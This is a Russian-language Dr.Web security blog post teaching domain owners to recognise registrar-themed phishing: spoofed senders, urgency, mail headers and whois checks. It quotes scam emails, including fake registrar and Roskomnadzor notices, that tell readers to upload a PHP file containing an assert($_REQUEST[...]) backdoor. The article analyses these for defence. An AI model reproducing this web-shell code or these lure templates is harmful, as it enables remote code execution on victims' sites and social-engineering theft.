Вы используете устаревший браузер!

Страница может отображаться некорректно.

  • добавить в избранное
    Добавить в закладки

ВА-ЖН-ЫЕ ПИ-СЬ-МА

Прочитали: 2313 Комментариев: 50 Рейтинг: 61

Некоторые темы для киберпреступников являются поистине вечнозелеными. Мы уже писали о мошеннических рассылках владельцам доменов – и вот, пошла вторая волна. Значит, пришло время еще раз написать о том, как распознать спам в письме от доверенного на первый взгляд отправителя.

Проанализируем мошенническую рассылку на примере письма, которое пришло в компанию «Доктор Веб» (у нас тоже пытались увести домен, представляете?).

#drweb

Первое, на что обращаем внимание, – имя отправителя в строке почтового клиента и в открытом письме различается. Причем в строке почтового клиента вид отправителя (R-U-C-ENT-ER), мягко говоря, намекает на спам.

#drweb

Вторая странность – получатель. Письмо пришло на marketing@drweb.com – странный адрес для такого письма. Письма такого рода должны приходить на адрес ответственного лица либо в крайнем случае на какой-нибудь admin@. Но уж никак не на маркетинг. Видимо, мошенники рассчитывают, что недалекие маркетологи перешлют письмо в бухгалтерию. Но они ошиблись!

Далее мы видим стандартный признак писем фишеров – создание паники. Вы должны оплатить услугу в течение одного дня. СРОЧНО!!!

Обычно подобные уведомления приходят задолго до окончания срока регистрации домена. Вот пример от одного из провайдеров (достаточно старый пост, рассылка идет уже, наверно, года четыре – и за это время в ней не поменялось ни слова).

Также обращаем ваше внимание на то, что мы напоминаем о необходимости продления домена за 54, 30, 14, 7 и 2 дня до истечения срока регистрации.

Чтобы удостовериться в безосновательности угроз мошенников, проверьте, когда на самом деле истекает срок регистрации вашего домена:

  • для доменов в зонах .RU, .SU, .РФ воспользуйтесь сервисом whois (графа Дата окончания регистрации);
  • для доменов в международных зонах обратитесь в нашу службу поддержки для получения информации.

Источник

У разных провайдеров услуг сроки уведомления могут различаться, но в любом случае вас уведомят не за день, а гораздо раньше.

Далее перейдем к анализу служебных заголовков, о них мы писали в нескольких выпусках.

Наряду с информацией, видимой получателем письма, – полями «От», «Кому», «Тема» и т. д., каждое письмо содержит служебную информацию, обычно не показываемую пользователю, но необходимую для успешной доставки письма. Наиболее информативны служебные заголовки – информация, в которой указаны адреса отправителя и получателя, маршрут движения письма, кодировки, тема письма и т. п. Антивирусные и антиспам-системы также оставляют там свои пометки. Вся эта информация передается почтовыми системами в самом начале процедуры отправки сообщения, поэтому и называется заголовком. Почтовые программы отделяют эту информацию от тела письма и скрывают ее от пользователя, отображая лишь немногие поля – те самые «От», «Кому» и «Тема».

В разных почтовых клиентах (и даже разных версиях одного клиента) служебные заголовки письма открываются разными способами. Рекомендуем посмотреть инструкции, например, здесь.

Напомним, что тот адрес, который вы видите в поле «От», ничего не значит, это по сути просто текст. В пересылке письма он не участвует. Злоумышленник (да, собственно, и вы тоже) может прописать туда все, что угодно. Настоящий адрес отправителя (хотя и его можно подделать) прописан именно в служебных заголовках. В данном случае это:

Return-Path: <apgbpl@genesis.thewebpeople.asia>

#drweb

Чуть ниже можно найти еще немного информации об отправителе:

Received-SPF: none client-ip=117.120.7.123; envelope-from=apgbpl@genesis.thewebpeople.asia; helo=acespex.com.sg

Не правда ли, совсем не похоже на то, что вы увидели в приведенном выше примере? Как минимум доменная зона (то, что находится после знака@) должна совпадать с доменом вашего регистратора – чего явно не наблюдается.

Информацию о почтовом отправителе также можно узнать в служебных заголовках:

X-Mailer: Microsoft Windows Live Mail 15.4.3538.513

Странный почтовый клиент для России.

В разных письмах набор полей также может отличаться, но в случае сомнений заглянуть в него всегда стоит.

Далее: оплата. Нажимать на кнопку, конечно, не стоит – мало ли что по ссылке. Но уж экспериментировать, так экспериментировать.

#drweb

Кнопка Оплатить ведет на ресурс, не связанный с регистратором вашего домена. Еще пример рекомендаций:

2) Ссылка ведет на перевод в кошелек Яндекс – регистраторы так не работают.

Источник

Но предположим, что админа сейчас в вашей организации в пределах доступности нет. В таком случае вы всегда можете самостоятельно проверить даты окончания регистрации. Сделать это можно через один из многочисленных сервисов whois (о них мы также уже писали). Если вы хотите найти подобный сервис, то поисковике вводим слово whois и выбираем понравившийся. Далее вводим имя вашего домена и смотрим необходимую вам дату.

Раз уж нам говорят, что у virus-encyclopedia.ru всё плохо, проверим информацию по этому домену.

#drweb

Как видим, ровно год нам еще не о чем беспокоиться.

Рассмотренное выше мошенничество достаточно безобидно. Максимум что вы потеряете, так это деньги. Но среди схожих схем мошенничества есть и куда более опасные. Вот пример:

#drweb

на электронную почту девушки приходит письмо от RU-CENTER, в котором указано, что заказана услуга смены регистратора домена, и что она произойдёт в течение 72 часов. Письмо абсолютно стандартное, я сравнил его с обычными письмами регистратора, внешних отличий не обнаружил. Удалось их увидеть только открыв исходник, со всеми хидерами.

В тексте дана стандартная ссылка для входа в интерфейс RU-CENTER, чтобы подтвердить или отменить "услугу". Если заказать в Руцентре подтверждение E-Mail, например, придёт очень похожее письмо с очень похожей ссылкой. По клику на ссылку открывается интерфейс Руцентра, где нужно ввести логин и пароль для входа в админку. Всё как обычно (разве что кодировка "уехала").

#drweb

ссылка ведёт не на NIC.ru, а на левый сайт vicousfun.com, ввести можно любую абракадабру вместо логина и пароля, и всё равно произойдёт вход. Рассчитано всё это на то, что нажавший ссылку введёт свой настоящий логин и пароль, злоумышленники его запишут и смогут использовать для входа уже в настоящий RU-CENTER.

Источник

Кликнув по ссылке, вы в дополнение к прочим проблемам можете установить себе на компьютер любую заразу.

Еще более опасный вариант:

Уважаемый клиент!

В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменом 4memo.ru осуществляется лицом, указанным в качестве его администратора.

Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл a1z8afzuzthnjyo0.php со следующим содержимым:

<?php
assert(stripslashes($_REQUEST[R01]));
?>

Файл должен быть создан в течение трех календарных дней с момента получения настоящего письма и находиться на сервере до 27 января 2017 года, 20:00 (UTC+03:00), в противном случае процедура подтверждения не будет пройдена.

Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено.

Источник 1, 2, 3

Это уже атака. Злоумышленники просят создать в корневой директории сайта вредоносный файл, делать этого ни в коем случае нельзя! Они предлагают разместить код с функцией assert – эта функция выполняет код из параметра, а параметр злоумышленник может передать любой по GET/POST запросу ($_REQUEST[RUCENTER] – именно параметр от клиента).

Отметим, что подобные письма могут приходить не только от имени регистраторов.

Здравствуйте.

Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени www.yandex.ru в сети «Интернет».

В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ «О внесении изменений в Федеральный закон „Об информации, информационных технологиях и о защите информации“ и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 2 1618/2015, Ваш сайтwww.yandex.ru был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

Для идентификации Вас, как администратора доменного имени www.yandex.ru, Вам необходимо:

  1. Cоздать в корневой директории Вашего сайта папку reestr
  2. Cоздать в данной папке файл reestr-id198617.php, содержащий следующий текст:

< ?php
/*Подтверждение доменного имени www.yandex.ru*/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>

*В < ?php необходимо убрать пробел между < и ?php
Путь до файла на Вашем сайте должен получиться следующий: www.yandex.ru/reestr/reestr-id128032.php

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени www.yandex.ru, следую инструкции указанной выше, то Ваш сайт www.yandex.ru будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.

— С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.

При переходе на адрес roskomnadzor.org пользователя перекидывает на rkn.gov.ru что создает иллюзию реального сайта и домена. Домен roskomnadzor.org был зарегистрирован 6 дней назад.

Источник

По последней ссылке есть разбор о том, что в результате атаки могут внедрить злоумышленники.

#почта #спам #антиспам #мошенническое_письмо #социальная_инженерия #фишинг

Dr.Web рекомендует

  1. Установите антиспам.
  2. Будьте внимательны, открывая электронные письма.

Если вы оплатили продление домена в пользу мошенников, для защиты своих прав и возврата средств вам следует обратиться с заявлением в отдел «К» МВД России. Образец заявления доступен для скачивания по ссылке.

Получайте Dr.Web-ки за участие в проекте

Каждая активность = 1 Dr.Web-ка

Оцените выпуск

Сделайте репост

Поставьте «Нравится»

Чтобы получать награды надо войти на страницу выпуска через аккаунт на сайте «Доктор Веб» (или создать аккаунт). Аккаунт должен быть связан с вашим аккаунтом в социальной сети. Видео о связывании аккаунта.


Нам важно ваше мнение

10 Dr.Web-ок за комментарий в день выхода выпуска или 1 Dr.Web-ка в любой другой день. Комментарии публикуются автоматически и постмодерируются. Правила комментирования новостей «Доктор Веб».

Чтобы оставить комментарий, нужно зайти через свой аккаунт на сайте «Доктор Веб». Если аккаунта еще нет, его можно создать.

Комментарии пользователей